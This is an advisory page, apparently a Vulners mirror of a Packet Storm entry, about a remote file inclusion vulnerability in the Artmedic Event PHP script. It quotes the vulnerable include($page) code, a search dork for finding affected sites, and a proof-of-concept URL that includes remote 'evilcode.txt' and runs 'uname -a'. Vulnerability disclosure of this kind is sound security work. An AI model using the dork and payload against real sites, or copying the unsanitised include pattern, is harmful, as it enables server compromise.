Lucene search
K

ArtmedicEvent.txt

🗓️ 29 Apr 2006 00:00:00Reported by Andries BruinsmaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Remote file include vulnerability in Artmedic Event Script on http://www.artmedic.de/ poses high ris

Code
`   
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html  
#Artmedic Event Remote File Include Vulnerability  
#Website : http://www.artmedic.de/  
#Script : Artmedic Event Script  
#Risk : High  
#Class : Remote  
#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..  
#d0rk : "/event/index.php?page=" "Artmedic Web Desing"  
  
Description [Deutch] "artmedic event, author Ellen Baitinger, artmedic webdesign, http://www.artmedic.de Dieses Programm ist Freeware und darf kostenlos eingesetzt werden, solange der Link auf artmedic webdesign und die Hinweise der Autorenschaft unangetastet bleiben."  
  
I.  
  
if(!file_exists("artmedic_event_inc.php"))   
{include("setup.php");   
exit;   
}   
require("artmedic_event_inc.php");   
echo "$eventtitle";   
$start = filectime($news);   
$jetzt = time();   
$update = "$start"+"$timespan";   
if($jetzt >= $update)   
{include("artmedic_event_html.php");}  
  
-----------------------------------------------------------------------------  
  
II.  
  
if(!$id and !$page)   
{@include("artmedic_event1.htm");}   
if(!$id and $page)   
{@include("$page");}   
if($id==1)   
{include("artmedic_event_inputform.htm");}   
if($id==2)   
{include("artmedic_event_add.php");}   
?  
-------------------------------------------------------------------------------  
  
  
III.  
  
Proof of Concept:  
  
http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation